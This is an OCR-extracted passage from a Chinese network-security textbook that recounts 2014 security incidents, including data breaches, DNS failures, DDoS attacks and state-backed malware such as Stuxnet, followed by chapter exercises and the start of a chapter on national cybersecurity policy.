影响 ,表现 得 更 加 安全 。 建 议 国 内 互联 网 企业 以 后 更 多 选用 . cn 域名 防备 危机 。2013 年 
国内 曾 两 次 发 生 过 根 域名 故障 ,一 次 是 2013 年 07 月 06 日 ,上 海 联通 DNS 设备 发 生 故 
障 , 导 致 2G、3G 的 手机 用 户 无 法 上 网 。 另 一 次 是 2013 年 08 月 25 日 ,.cn 根 域名 服务 器 
全 线 故障 。 时 隔 5 个 月 ,国内 再 次 发 生 DNS 故障 。 域 名 系统 (Domain Name System， 
DNS) ,因特网 上 作为 域名 和 IP 地 址 相互 映射 的 一 个 分 布 式 数据 库 , 能 够 使 用 户 更 方便 
地 访问 互联 网 ,而 不 用 去 记 住 能 够 被 机 器 直接 读 取 的 IP 数 串 。 通 过 主机 名 ,最 终 得 到 该 
主机 名 对 应 的 IP 地 址 的 过 程 叫 作 域名 解析 (或 主机 名 解析 )。DNS 协议 运行 在 UDP 协 
议 之 上 ,使 用 端口 号 53。DNS 服务 器 一 般 是 当地 电信 运营 商 的 服务 器 。 如 果 这 个 服务 
器 不 知道 ,他 就 会 向 上 一 级 请 求 ,一 般 是 运营 商 的 全 国 性 DNS 服务 器 。 如 果 这 个 全 国 性 
DNS 还 不 知道 会 向 全 球 DNS 服务 器 查询 。 这 一 级 一 级 的 层级 中 ,最 高 一 级 是 全 球 的 根 
服务 器 。 根 服务 器 ,主要 用 来 管理 互联 网 的 主 目录 ,全 世界 只 有 13 台 , 名 字 分 别 为 A 一 M， 
其 中 10 台 设 置 在 美国 ,另外 各 有 一 台 设 置 于 英国 .瑞典 和 日 本 。2010 年 3 月 16 日 以 前 ， 
中 国 大 陆 有 F 和 1 这 两 个 根 域 DNS 镜像 ,但 因为 多 次 发 生 DNS 污染 ,进而 影响 国外 网 络 
稳定 ,威胁 到 国际 互联 网 安全 和 自由 ,被 迫 断 开 与 国际 互联 网 的 连接 。 这 次 DNS 解析 出 
错 , 才 导 致 国内 大 部 分 网 站 无 法 访问 。 一 位 DNS 技术 专家 解释 说 ,这 次 的 问题 仅 出 现在 
中 国 , 说 明 全 球根 服务 器 并 未 出 现 问题 ,问题 很 可 能 是 国内 网 络 运 营 商 。“ 简 单 地 说 ,我 
们 访问 baidu. com 域名 的 网 站 先 要 指向 根 服 务 器 , 根 服务 再 将 用 户 指 向 . com 服务 器 ， 
.com 的 解析 服务 器 再 把 用 户 指向 baidu. com。” 之 所 以 有 部 分 用 户 还 可 以 正常 访问 互联 
网 ,是 因为 其 网 络 DNS 服务 器 有 一 定 的 缓存 时 间 。 如 果 根 服务 器 的 故障 持续 ,全 国 大 部 
分 网 站 都 将 受到 影响 。 但 65. 49. 2. 178 这 个 IP 地 址 属于 美国 北 卡 罗莱 纳 州 卡 里 镇 
Dynamic Internet Technology 公司 。 多 家 中 国 公 司 被 解析 到 美国 某 公 司 , 也 有 可 能 是 黑 
客 攻 击 的 结果 。 

同样 是 在 2014 年 1 月 ,斯 诺 登 再 次 曝光 以 民主 堡垒 自居 的 美国 通过 互联 网 监听 从 
事 工业 间谍 活动 。 斯 诺 登 称 ,美国 的 工业 间谍 活动 所 针对 的 不 仅 限于 国家 安全 问题 ,而 
且 还 包括 任何 可 能 对 美国 有 价值 的 工程 和 技术 资料 。 此 后 ,斯 诺 登 相继 又 爆 出 了 使 用 云 
服务 ,搜索 引擎 和 社交 媒体 的 有 关 风 险 , 暗 示 谷 歌 和 脸谱 都 与 政府 勾结 进行 监听 和 提供 
“危险 ”服务 。7 月 ,斯 诺 登 又 指责 Dropbox 公司 “对 隐私 怀 有 敌意 ”, 并 是 美国 政府 棱镜 
窥探 计划 的 帮凶 。 

2014 年 1 月 21 日 ,2000 万 韩国 人 信用 卡 信息 被 盗 。 韩 国 监 管 部 门 表示 ,近期 的 一 
起 事故 中 ,在 人 口 5000 万 的 韩国 ,至 少 有 2000 万 人 的 信用 卡 信息 被 盗 。 近 年 来 ,韩国 许 
多 大 公司 都 曾 遭 遇 过 用 户 数据 泄露 事故 ,其 中 部 分 是 由 于 黑客 攻击 ,部 分 是 由 于 内 部 员 
工 泄密 。 此 次 大 规模 的 泄露 不 是 因为 哪个 黑客 组 织 技术 高 超 , 而 是 源 自 个 人 信用 评估 公 
司 的 内 部 员工 监 守 自 盗 。 这 家 韩国 信用 评估 机 构 (Korean Credit Bureau) 的 员工 随即 被 
逮捕 。 这 个 内 鬼 从 三 大 韩国 银行 的 内 部 服务 器 里 调 取 了 这 些 用户 敏 感 信息 ,并 转卖 给 电 
话 营销 公司 。 泄 露 的 个 人 信息 包括 用 户 姓 名 、 身 份 证 号 .电话 、 信 用 卡号 码 、 信 用 卡 有 效 
期 。 这 是 韩国 历史 上 最 严重 的 信息 泄露 事件 。 

非 传 统 安 全 是 相对 传统 安全 威胁 因素 而 言 的 , 指 除 军事 ,政治 和 外 交 冲 突 以 外 的 其 
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他 对 主权 国家 及 人 类 整体 生存 与 发 展 构成 威胁 的 因素 。 非 传统 安全 问题 主要 包括 经 济 
安全 ,金融 安全 ,生态 环境 安全 、 信 息 安全 、 资 源 安 全 、 恐 怖 主义 、 武 器 扩散 ,疾病 莹 延 . 跨 
国 犯 罪 .走私 贩毒 非法 移民 海盗 .洗钱 等 。 因 此 面 对 严 峻 的 网 络 信息 安全 形势 ,2014 年 
2 月 27 日 ,中 央 网 络 安全 和 信息 化 领导 小 组 宣告 成 立 ,并 在 北京 召开 了 第 一 次 会 议 , 习 近 
平 亲 自 担任 组 长 ,李克强 、. 刘 云 山 任 副 组 长 。 由 此 ,网 络 安全 上 升 为 国家 安全 战略 ,成 为 
国家 安全 的 重 中 之 重 。 中 央 网 信 小 组 将 着 眼 于 国家 安全 和 长 远 发 展 ,统筹 协调 涉及 经 
济 ,政治 文化 ,社会 及 军事 等 各 个 领域 的 网 络 安全 和 信息 化 重大 问题 ,研究 制定 网 络 安 
全 和 信息 化 发 展 战略 、 宏 观 规 划 和 重大 政策 ,推动 国家 网 络 安全 和 信息 化 法 治 建设 ,不 断 
增强 网 络 及 信息 安全 保障 能 力 。 中 央 网 络 安全 和 信息 化 建设 领导 小 组 的 成 立 是 以 规格 
高 .力度 大 .立意 远 来 统筹 指导 中 国 迈 向 网 络 强国 的 发 展 战略 。 在 中 央 层 面 设 立 一 个 更 
强 有 力 、 更 有 权威 性 的 机 构 ,体现 了 中 国 最 高 层 全 面 深 化 改革 、 加 强 顶 层 设 计 的 意志 , 
示 出 在 保障 网 络 安全 、 维 护 国家 利益 、 推 动 信息 化 发 展 的 决心 。 这 是 落实 十 八 届 三 中 全 
会 精神 的 又 一 重大 举措 ,是 中 国 向 网 络 安全 和 信息 化 国家 战略 迈 出 的 重要 一 步 ,标志 
这 个 拥有 6 亿 网 民 的 网 络 大 国 加 速 向 网 络 强国 挺进 。 网 络 安全 是 国家 安全 的 新 领域 , 且 
不 仅仅 涉及 信息 战 ,还 涉及 与 论 、 公 共 关 系 .技术 ,更 涉及 公共 安全 。 

2014 年 的 3 月 ,携程 信息 “安全 门 " 事 件 敲 响 网 络 消费 安全 警钟 。 乌 云 漏 洞 平台 3 月 
22 日 晚间 发 布 消息 称 ,国内 在 线 旅游 市 场 份额 最 大 的 服务 商 携程 网 安全 支付 日 志 存 在 漏 
洞 , 可 导致 大 规模 用 户 信息 ,如 姓名 ,身份 证 号 .银行 卡 类 别 、 银 行 卡 卡号 .银行 卡 cvv( 信 
用 卡 背 面 的 三 位 数 安 全 码 ) 码 等 信息 泄露 。 这 意味 着 ,一 旦 这 些 信息 被 黑客 窃取 ,在 网 络 
上 盗 刷 银行 卡 消费 将 易如反掌 。 事 实 上 , 像 携程 一 样 融和 人 公众 生活 的 电 商 网 站 和 在 线 平 
台 越 来 越 多 ,此 次 携程 “漏洞 门 ? 事 件 也 引发 了 人 们 对 电 商 和 在 线 平台 如 何 进行 用 户 信息 
安全 防护 的 思考 。 

2014 年 的 4 月 ,英国 央行 雇用 黑客 进行 内 部 攻防 测试 ,起 到 了 示范 作用 。 在 IT 界 ， 
大 型 组 织 常 常 雇用 电脑 黑客 已 经 是 一 个 众所周知 的 “秘密 ”了 ,这 些 特殊 黑客 的 工作 ,就 
是 对 系统 进行 调 校 ,以 尽 可 能 地 确保 公司 的 安全 。 然 而 ,尽管 这 或 许 已 经 是 一 个 常识 性 
的 东西 ,但 却 并 没有 多 少 公 司 公开 谈论 雇用 黑客 的 事情 。2014 年 4 月 , 当 英国 央行 (Bank 
of England) 宣 布 雇用 黑客 来 帮助 其 对 二 十 多 个 主要 银行 进行 防御 测试 时 ,立刻 引起 了 和 轩 
然 大波 。 然 而 ,此 举 还 是 得 到 了 网 络 安全 专业 人 士 的 认可 。 有 人 认为 ,英国 走 在 网 络 保 
护 的 前 沿 , 能 够 对 消费 者 ,企业 和 经 济 起 到 正面 的 影响 作用 。 

同样 是 在 2014 年 4 月 ,微软 正式 停止 对 Windows XP 系统 技术 支持 。2014 年 4 月 8 
日 ,微软 正式 宣布 停止 对 Windows XP 系统 提供 技术 支持 。 微 软 表示 ,Windows XP 的 运 
行 环境 存在 很 大 的 漏洞 ,微软 发 布 的 补丁 不 能 有 效 抑制 病毒 的 攻击 ,因此 不 断 在 其 官网 
上 告知 用 户 可 能 承受 一 些 风 险 。 这 意味 着 此 后 Windows XP 操作 系统 出 现任 何 漏洞 , 微 
软 不 会 再 提供 任何 系统 更 新 修补 漏洞 ,一旦 系统 出 现 漏洞 且 没 能 及 时 修补 ,可 能 会 引发 
安全 隐患 ,如 电脑 感染 木马 程序 、 电 脑病 毒 或 遭遇 黑客 的 人 侵 。 作 为 微软 历史 上 最 成 功 
的 操作 系统 ,Windows XP 操作 系统 至 今 在 全 球 仍 有 近 30% 的 市 场 份额 ,而 在 中 国 , 使 用 
Windows XP 系统 的 用 户 比 例 更 是 高 达 70% ,用 户 总 量 超过 2 亿 。 

2014 年 的 5 月 ,小 米 800 万 用 户 数据 泄露 。2014 年 的 5 月 13 日 晚间 ,有 爆料 称 小 米 
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论坛 用 户 数据 库 疑 似 泄露 ,涉及 用 户 约 800 万 。 经 乌云 漏洞 报告 平台 证 实 , 小 米 数据 库 
已 在 网 上 公开 传播 下 载 ,与 小 米 官方 数据 吻合 。 据 安全 专家 分 析 , 小 米 论坛 官方 数据 库 
泄露 ,涉及 800 万 使 用 小 米 手机 、MIUTI 系统 等 小 米 产 品 的 用 户 ,泄露 数据 带 有 大 量 用 户 
资料 ,可 被 用 来 访问 小 米 云 服务 并 获取 更 多 的 私密 信息 ,甚至 可 通过 同步 获得 通讯 录 、 短 
这 、 照 片 定位、 锁定 手机 及 删除 信息 等 。 

2014 年 5 月 16 日 ,中 国政 府 采 购 网 公布 的 (中 央 国 家 机 关 政 府 采 购 中 心 重要 通知 》 
称 ,所 有 计算 机 类 产品 不 允许 安装 Windows 8 操作 系统 。2014 年 7 月 ,公安 部 科技 信息 
化 局 下 发 通知 , 称 赛 门 铁 克 的 “数据 防 泄露 ”产品 存在 穷 密 后 门 和 高 危 漏洞 ,要 求 各 级 公 
安 机 关 今 后 禁止 采购 。2014 年 9 月 ,银监会 正式 发 布 的 《应 用 安全 可 控 信息 技术 指导 意 
见 》 中 明确 指出 ,从 2015 年 起 ,各 银行 业 金 融 机 构 对 安全 可 控 信息 技术 的 应 用 以 不 低 于 
15% 的 比例 逐年 增加 ,直至 2019 年 掌握 银行 业 信息 化 的 核心 知识 和 关键 技术 ,安全 可 控 
信息 技术 在 银行 业 达 到 不 低 于 75% 的 总 体 占 比 。 这 一 系列 的 举措 意味 着 我 国政 府 和 企 
业 开 始 正 视 网 络 信息 安全 长 期 依赖 国外 技术 的 现象 ,国产 信息 安全 软件 及 企业 将 迎 来 新 
的 发 展 机 遇 。 

2014 年 的 8 月 ,快递 公司 官网 遭 入 侵 ,1400 万 用 户 快递 数据 遭 到 泄露 。2014 年 8 月 
12 日 ,警方 破获 了 一 起 信息 泄露 案件 ,犯罪 嫌疑 人 通过 快递 公司 官网 漏洞 ,登录 网 站 后 
台 , 然 后 再 通过 上 传 ( 后 门 ) 工 具 就 能 获取 该 网 站 数据 库 的 访问 权限 ,获取 了 1400 万 条 用 
户 信息 ,除了 有 快递 编码 外 ,还 详细 记录 着 收 货 和 发 货 双 方 的 姓名 .电话 号 码 、 住 址 等 个 
人 隐私 信息 ,而 黑客 拿 到 这 些 数据 仅 用 了 20 秒 的 时 间 。 

同样 是 在 2014 年 的 8 月 ,iCloud 曝 安 全 漏洞 , 侠 果 陷入 “艳照 门 " 事 件 。 苹果 公司 一 
向 以 其 自身 设备 和 服务 的 安全 而 自豪 .但 2014 年 8 月 , 随 着 其 iCloud 服务 被 黑客 攻破 ， 
造成 数 百 家 喻 户 晓 的 名 人 私密 照片 被 盗 , 其 中 包括 主演 影片 (饥饿 游戏 ) 的 明星 詹妮弗 。 
劳伦斯 ,还 有 知名 影星 斯 嘉 丽 。 约 输 逊 和 金 。 卡 戴 丙 的 裸照 在 网 络 流传 。 据 报道 ,一 名 
黑客 利用 “寻找 丢失 iPhone”(Find me iPhone) 功 能 漏洞 盗 取 用 户 信息 。 由 于 iCloud 允 
许 用 户 多 次 尝试 密码 ,黑客 针对 某 些 女 星 的 公开 邮件 账号 反复 猜测 ,并 获取 她 们 相机 里 
面 的 私人 照片 以 及 其 他 明星 的 邮件 地 址 。 事 件 被 证 实 是 针对 部 分 女 星 的 有 目的 黑客 行 
为 。 此 后 ,苹果 公司 首次 承认 了 iPhone 确实 存在 “安全 漏洞 ”, 蔷 果 员 工 可 以 利用 此 前 未 
公开 的 技术 提取 用 户 个 人 深层 数据 ,包括 短信 信息 、 联 系 人 列表 以 及 照片 等 。 如 今 很 多 
的 智能 手机 通常 都 会 自动 备份 文件 到 云 服务 器 ,该 事件 也 为 云 服 务 的 安全 性 敲 响 了 
警钟 。 

2014 年 的 10 月 ,130 万 考研 用 户 信息 被 泄露 。2014 年 10 月 31 日 考研 报名 结束 后 
不 久 , 网 上 出 现 有 人 出 售 截至 2014 年 11 月 份 的 130 万 考研 用 户 的 信息 ,卖家 打包 价 是 
1.5 万 元 。 这 么 庞大 的 考研 用 户 数据 泄露 ,距离 2015 年 考研 报考 者 的 “全 军 覆 没 " 已 经 不 
远 。 据 网 络 漏洞 报告 平台 乌云 网 联合 创始 人 备 卓 介绍 ,有 乌云 网 用 户 透 露 ,考研 报名 数 
据 可 能 遭 到 泄露 并 被 售卖 ,数据 中 包括 考研 者 姓名 .性 别 . 手 机 号 码 . 身 份 证 号 .家 庭 住 
址 、 学 校 、. 报 考 专业 等 信息 ,非常 详细 。 

同样 是 在 2014 年 的 10 月 ,摩根 大 通 银行 被 黑 ,8300 万 客户 信息 泄露 。 早 在 2014 年 
夏天 ,黑客 控制 了 美国 最 大 的 银行 摩根 大 通 的 90 多 台 服 务 器 ,而 摩根 大 通 只 有 一 台 服 务 
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器 没有 采取 两 步 验证 的 方式 ,黑客 正 是 通过 这 人 台 服 务 器 的 一 个 账户 进入 了 其 他 服务 器 ， 
盗 取 了 8300 万 用 户 信息 。 服 务 器 遭 黑客 人 侵 之 后 ,摩根 大 通 几 个 月 内 都 毫 无 所 察 。 此 
次 事件 造成 了 摩根 大 通 7600 万 家 庭 账户 和 700 万 个 小 企业 账户 的 户 名 、 地 址 .电话 和 电 
子 邮件 被 泄露 的 严重 后 果 。 但 直至 2014 年 10 月 2 日 ,摩根 大 通 银行 才 承 认 8300 万 相关 
信息 被 泄露 。 人 们 一 般 认 为 ,被 攻破 的 都 是 些 安全 措施 薄弱 的 公司 ,然而 众所周知 的 是 ， 
摩根 大 通 在 安全 保护 领域 有 着 非常 完善 的 安全 规划 并 不 惜 投入 巨 资 ,因为 该 公司 每 年 都 
会 投入 2.5 亿美 元 资金 用 于 打造 顶级 安全 的 网 络 系统 。 摩 根 大 通信 息 泄露 事件 成 为 了 
美国 历史 上 规模 最 大 的 客户 数据 泄露 案 之 一 。 

2014 年 的 11 月 ,全 球 互 联网 域名 管理 机 构 ICANN 遭 黑 客 攻击 。2014 年 11 月 底 开 
始 ,互联 网 域名 管理 机 构 ICANN 接连 遭 到 不 明 黑 客 发 起 的 严重 钓鱼 式 攻击 ,攻击 采用 模 
拟 本 机 构 内 部 域名 的 方式 向 员工 发 送 电子 邮件 来 欺骗 员工 ,导致 ICANN 多 位 员工 的 电 
邮 身 份 信息 被 资 , 其 数据 遭 外 汇 。2014 年 12 月 初 ,ICANN 再 次 发 现 这 些 受到 影响 的 电 
子 邮件 身份 信息 又 被 用 于 访问 除 电 邮 系 统 以 外 的 其 他 ICANN 系统 ,包括 ICANN 内 部 
的 “中 央 区 域 数据 系统 ”中 有 关 用 户 的 姓名 和 地 址 信息 也 被 外 泄 。 受 影响 的 信息 还 涉及 
ICANN 的 维基 系统 ,官方 博客 系统 ,以 及 查询 域名 记录 的 Whois 信息 门户 。 

同样 是 在 2014 年 的 11 月 ,索尼 影 业 被 黑 .朝鲜 网 络 瘫痪 事件 持续 发 酵 。2014 年 11 
月 22 日 ,美国 索尼 影视 娱乐 公司 受到 自称 “和平 卫 士 ? 的 黑客 组 织 的 攻击 ,导致 公司 系统 
被 迫 关闭 。 这 是 安全 声誉 欠 佳 的 索尼 继 一 连 串 针对 其 PlayStation(PS) 网 络 的 攻击 后 , 受 
到 的 又 一 次 沉重 打击 。 此 次 攻击 造成 包括 索尼 员工 信息 .公司 计划 .产品 情况 .索尼 高 层 
往来 邮件 ,名 人 电子 邮件 在 内 的 内 部 敏感 详细 信息 泄露 ,还 有 索尼 影视 未 发 布 的 几 部 影 
片 都 被 公布 到 网 上 供 网 民 下 载 。 但 最 为 铠 怖 的 一 点 是 ,黑客 此 次 使 用 到 了 一 种 可 以 删除 
服务 器 数据 的 超级 病毒 ,这 一 病毒 的 爆发 甚至 可 以 瘫痪 掉 整 个 索尼 公司 网 络 。 此 次 事件 
起 因 于 索尼 影视 娱乐 公司 近日 发 行 的 “以 刺杀 朝鲜 最 高 领导 人 金正 恩 ? 为 主题 的 电影 ( 采 
访 》, 由 于 多 方 介 入 和 媒体 推波助澜 ,此 事 已 经 发 酵 成 一 起 国际 政治 事件 。 美 国联 邦 调查 
局 声称 背后 黑手 是 朝鲜 ,总 统 奥巴马 也 两 次 发 声 要 打击 网 络 攻击 行为 。 而 从 2014 年 12 
月 23 日 起 ,朝鲜 互联 网 开始 出 现 不 稳定 状态 ,使 用 朝鲜 官方 域名 (. kp) 的 网 站 全 面 陷 入 
瘫痪 ,9 小 时 后 逐渐 恢复 正常 。2014 年 12 月 26 日 凌晨 1 时 起 ,朝鲜 官方 通讯 社 朝鲜 中 央 
通讯 社 网 站 持续 7 小 时 无 法 访问 ,期 间 网 站 主页 偶尔 能 打开 但 速度 较 慢 。2014 年 12 月 
27 日 上 午 , 朝 中 社 网 站 才 恢 复 正 常 。 据 朝 中 社 2014 年 12 月 27 日 报道 ,朝鲜 国防 委员 会 
政策 局 发 言 人 当天 发 表 声明 ,再 次 否认 朝鲜 与 索尼 影像 娱乐 公司 遭 到 网 络 攻击 案 有 关 ， 
并 称 近日 朝鲜 网 络 一 度 中 断 是 美国 进行 网 络 攻击 所 致 。 声 明 还 说 ,美国 在 任何 情况 下 ， 
都 不 能 将 电影 《采访 ) 的 放映 和 传播 合理 化 。 

2014 年 的 12 月 ,智联 招聘 86 万 条 求职 简历 数据 遭 泄 露 。 乌 云 漏洞 平台 2014 年 12 
月 2 日 晚间 公开 了 一 个 关于 导致 智联 招聘 86 万 用 户 简历 信息 泄露 的 漏洞 。 据 称 黑 客 通 
过 该 漏洞 可 获取 包含 用 户 姓名 、 婚 姻 状 况 .出 生日 期 户籍 地 址 .身份 证 号 .手机 号 等 各 种 
详细 的 信息 ,并且 在 每 条 个 人 信息 前 , 均 标 注 “ 智 联 招聘 ?字样 。 

同样 是 在 2014 年 的 12 月 ,阿里 云 称 遭 互 联网 史上 最 大 规模 DDoS 攻击 。2004 年 12 
月 24 日 ,阿里 云 计算 发 表 声明 称 : 12 月 20 一 21 日 ,部署 在 阿里 云 上 的 一 家 知名 游戏 公 
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司 , 遭 遇 了 全 球 互联 网 史上 最 大 的 一 次 DDoS 攻击 。 阿 里 云 还 称 ,第 一 波 DDoS 攻击 从 
12 月 20 日 19 点 左右 开始 ,一 直 持 续 到 21 日 凌晨 ,第 二 天 黑客 又 再 次 组 织 大 规模 攻击 ， 
共 持 续 了 14 个 小 时 ,攻击 峰值 流量 达到 每 秒 453. 8GB。 

也 是 发 生 在 2014 年 12 月 ,12306 网 站 超 13 万 用 户 数据 遭 泄露 。 正 值 2015 年 春运 
抢 票 白 热 化 阶段 ,12306 网 站 用 户 数据 信息 发 生 大 规模 泄露 。2014 年 12 月 25 日 ,第 三 
方 漏洞 报告 平台 “乌云 网 ” 曝 出 12306 网 站 用 户 数据 泄露 ,大 量 用 户 数据 在 互联 网 遭 疯 
传 , 包 括 用 户 账号 .明文 密码 .身份 证 号 等 ,此 次 遭 泄露 的 12306 账户 总 数 超过 13 万 个 。 
随后 ,中 国 铁路 客户 服务 中 心 迅 速 在 其 官方 网 站 发 布 公告 确认 用 户 信息 泄露 事件 ,还 称 
此 次 泄露 信息 全 部 含有 用 户 的 明文 密码 ,网 上 泄露 的 用 户 信息 系 经 其 他 网 站 或 渠道 流 
出 ,还 提醒 用 户 不 要 使 用 第 三 方 抢 票 软件 购 票 或 委托 第 三 方 网 站 购 票 , 要 通过 12306 官 
方 网 站 购 票 ,以 防止 用 户 个 人 信息 外 汇 。 据 报道 ,12306 网 站 被 多 次 曝 出 漏洞 。 早 在 
2014 年 1 月 ,就 有 网 友 表示 12306 网 站 可 以 利用 假 护照 \ 假 身份 证 完成 订 票 。 之 后 , 曾 有 
利用 12306 漏洞 购 票 并 可 选择 上 下 铺 的 攻略 在 网 上 转发 。2014 年 7 月 ,“ 乌 云 网 ”又 上 曝 出 
12306 网 站 存在 漏洞 ,一 人 可 购买 一 车 厢 票 。 

总 体 上 来 看 ,从 2008 年 以 来 ,安全 威胁 的 实施 主体 已 经 变 得 丰富 多 样 , 既 有 如 以 往 
一 样 的 个 人 行为 ,也 有 黑客 组 织 如 "匿名 者 "“ 幽 灵 躯 碗 ”"“ 反 共 黑 客 ” 等 的 攻击 活动 。 其 
中 性 匿名 者 ”多 次 针对 全 球 各 国家 或 地 区 发 动 攻击 ,造成 了 极 大 的 破坏 六 幽灵 躯壳 ”声称 
要 对 中 国 发 动 名 为 “ 晴 昨 计划 ”的 网 络 攻 击 ;* 反 共 黑 客 ” 多 次 在 我 国境 内 党 政 机 关 、 高 校 
等 网 站 上 留 下 恶毒 攻击 中 国共 产 党 的 政治 言论 。 这 些 黑 客 组 织 经 过 多 年 的 发 展 , 不 仅 技 
术 水 平 较 高 ,管理 也 更 为 完善 ,规模 也 越 来 越 大 ,破坏 性 也 越 来 越 强 。 

本 阶段 的 安全 威胁 实施 主体 的 新 特点 是 由 国家 支撑 的 、 有 组 织 的 安全 威胁 。 例 如 ， 
“ 震 网 ”病毒 ,从 时 间 技术、 手段 .目的 ,攻击 行为 等 多 方面 来 看 ,完全 可 以 认为 发 起 此 次 
攻击 的 不 是 一 般 的 攻击 者 或 组 织 。 伊 朗 半 官方 的 通讯 社 报道 称 ,这 种 代号 为 “ 震 网 ”的 电 
脑 蠕 虫 病毒 很 可 能 是 伊朗 的 敌人 专门 为 破坏 布什 尔 核 电站 而 “ 量 身 定做 ”的 。 而 之 后 出 
现 的 “火焰 "病毒 “高 斯 "病毒 和 “红色 十 月 ”等 都 是 体积 庞大 、 构 成 复杂 .破坏 性 非常 强 的 
病毒 , 绝 非 个 人 和 小 规模 团体 组 织 所 能 编写 ,其 背后 都 有 国家 力量 支持 。 

本 阶段 的 安全 威胁 目标 指向 了 工业 控制 系统 及 终端 。 有 许多 安全 威胁 表现 形式 虽 
然 多 样 ,但 都 是 针对 工业 控制 系统 及 其 终端 的 有 组 织 APT 攻击 。 比 如 ,“ 震 网 ”“ 毒 曲 ”、 
“高 斯 " “火焰” 等 ,都 是 针对 工业 控制 系统 进行 恶意 攻击 ,使 国家 和 大 型 企业 的 网 络 信 息 
控制 系统 安全 面临 严峻 挑战 。 

本 阶段 安全 威胁 传播 方式 也 越 来 越 多 样 化 。 除 了 常规 的 利用 网 络 下 载 . 移 动 存储 介 
质 、 社 交 网 站 等 方式 ,利用 蓝牙 、 近 距离 无 线 通 信 技 术 (NFC) 等 新 型 传播 方式 层出不穷 。 
例如 ,“ 毒 曲 ” 病 毒 ,攻击 了 国内 一 家 拥有 蓝牙 软 硬 件 技术 的 高 科技 企业 。“ 火 焰 " 病 毒 则 
可 以 记录 键盘 操作 过 程 并 通过 蓝牙 无 线 传输 数据 。“ 震 网 ”病毒 则 可 以 在 不 联网 的 情况 
下 对 数据 进行 采集 与 监视 控制 系统 ,还 能 通过 移动 存储 介质 或 局 域 网 进行 传播 ,开创 了 
不 通过 互联 网 也 能 大 面积 传播 且 产生 巨大 影响 的 病毒 的 先河 。 

发 展 到 本 阶段 ,安全 威胁 已 经 很 少 以 单独 个 体 出 现 , 而 是 相互 融合 ,病毒 .木马 、 漏 
洞 、 后 门 、 僵 尸 网 络 等 相互 捆绑 , 环 环 相 套 ,使 所 有 的 安全 威胁 形成 一 个 链条 ,十 分 复杂 。 
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APT 攻击 也 大 多 结构 复杂 。 例 如 “火焰 "病毒 ,代码 中 用 到 的 混淆 字符 串 量 超 乎 寻常 ,这 
保证 了 可 执行 文件 的 功能 不 仅 难于 理解 ,而 且 即 使 代码 被 他 人 捕获 也 无 法 轻易 用 于 其 他 
目的 ,代码 中 至 少 涉及 几 十 种 加 密 函 数 ,例如 ,Blowfish 算法 .MD5/MD4 函数 等 。 且 能 
够 解析 多 种 文档 格式 ,例如 ,PDF、Microsoft Word 和 其 他 Office 格式 。 安 全 威胁 手段 和 
攻击 技术 已 发 展 至 一 个 前 所 未 有 的 成 熟 程度 ,攻击 工具 日 益 专 业 化 .智能 化 ,手法 越 来 越 
隐蔽 , 且 大 大 增加 了 防护 难度 。 


19 习 题 


(1) 网 络 安全 的 定义 是 什么 ? 

(2) 网 络 安全 包含 有 几 个 要 素 ?” 对 要 素 进 行 简要 说 明 。 

(3) 网 络 安全 的 主要 内 容 是 哪些 ? 

(4) 威胁 建 模 的 主要 步骤 有 哪些 ? 

(5) DREAD 模型 中 需要 考虑 哪些 要 素 ? 

(6)《 信 息 安 全 事件 分 类 分 级 指南 ) 中 对 信息 安全 事件 是 如 何 进行 分 类 的 ? 
(7) 请 简要 概述 黑客 发 展 趋势 。 

(8) 在 网 络 攻 击 类 型 中 ,主动 攻击 与 被 动 攻击 有 什么 区 别 ? 

(9) 常见 的 网 络 攻击 有 哪些 ? 

(10) 网 络 安 全 的 发 展 分 为 哪 三 个 阶段 ?每 个 阶段 各 有 什么 特点 ? 


第 7 均 sagsier > 
网 络 安全 纵 切 面 


21 国家 层面 的 网 络 安全 


2014 年 2 月 27 日 ,中 央 网 络 安全 和 信息 化 领导 小 组 成 立 。 该 领导 小 组 将 着 眼 国 家 
安全 和 长 远 发 展 ,统筹 协调 涉及 经 济 ,政治 ,文化 .社会 及 军事 等 各 个 领域 的 网 络 安全 和 
信息 化 重大 问题 ,研究 制定 网 络 安全 和 信息 化 发 展 战略 、 宏 观 规划 和 重大 政策 ,推动 国家 
网 络 安 全 和 信息 化 法 治 建设 ,不 断 增强 安全 保障 能 力 。 

2015 年 6 月 24 日 ,为 保障 网 络 安全 ,维护 网 络 空间 主权 和 国家 安全 ,促进 经 济 社会 
信息 化 健康 发 展 , 不 断 完 善 网 络 安全 保护 方面 的 法 律 法 规 , 十 二 届 全 国人 大 常委 会 第 
十 五 次 会 议 审议 了 网 络 安全 法 草案 。 草 案 共 七 章 六 十 八条 ,从 保障 网 络 产品 和 服务 安 
全 ,保障 网 络 运行 安全 ,保障 网 络 数据 安全 ,保障 网 络 信息 安全 等 方面 进行 了 具体 的 制度 
设计 。 网 络 主权 是 国家 主权 在 网 络 空间 的 体现 和 延伸 ,网 络 主权 原则 是 我 国 维护 国家 安 
全 和 利益 .参与 网 络 国际 治理 与 合作 所 坚持 的 重要 原则 。 为 此 ,草案 将 “维护 网 络 空间 主 
权 和 国家 安全 ”作为 立法 宗旨 。 同 时 ,按照 安全 与 发 展 并重 的 原则 , 设 专 章 对 国家 网 络 安 
全 战略 和 重要 领域 网 络 安全 规划 、 促 进 网 络 安全 的 支持 措施 作 了 规定 。 为 保障 关键 信息 
基础 设施 安全 ,维护 国家 安全 和 保障 民生 ,草案 对 关键 信息 基础 设施 的 运行 安全 作 了 规 
定 ,实行 重点 保护 。 为 保障 网 络 信息 依法 有 序 自由 流动 ,防止 公民 个 人 信息 被 窃取 、 泄 露 
和 非法 使 用 ,草案 在 全 国人 大 常委 会 关于 加 强 网 络 信息 保护 决定 的 基础 上 ,进一步 完善 
公民 个 人 信息 保护 制度 ,规范 网 络 信息 传播 活动 。 为 加 强国 家 的 网 络 安全 监测 预警 和 应 
急 制 度 建设 ,提高 网 络 安全 保障 能 力 , 草 案 要 求 国务 院 有 关 部 门 建立 健全 网 络 安全 监测 
预警 和 信息 通报 制度 ,加 强 网 络 安全 信息 收集 、 分 析 和 情况 通报 工作 ;建立 网 络 安全 应 急 
工作 机 制 , 制 定 应 急 预 案 ; 规 定 预警 信息 的 发 布 及 网 络 安全 事件 应 急 处 置 措施 。 

国家 的 种 种 “大 动作 ”都 说 明 网 络 安全 已 经 达到 了 “国家 战略 ”高 度 。 但 网 络 安全 是 
一 项 系统 的 工作 ,应 通过 建立 一 个 科学 全 面 的 网 络 信息 安全 保障 体系 ,来 有 效 地 管理 和 
控制 潜在 的 安全 风险 ,取得 良好 效果 ,保障 国家 安全 。 


